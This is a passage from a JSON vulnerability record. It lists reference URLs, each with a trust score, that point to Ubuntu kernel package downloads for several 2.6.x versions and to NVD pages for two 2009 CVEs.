        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-54.77_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-686_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-24.55_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24_2.6.24-24.55_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1072"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1336"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-k7_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-lpia_2.6.24-24.55_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-386_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
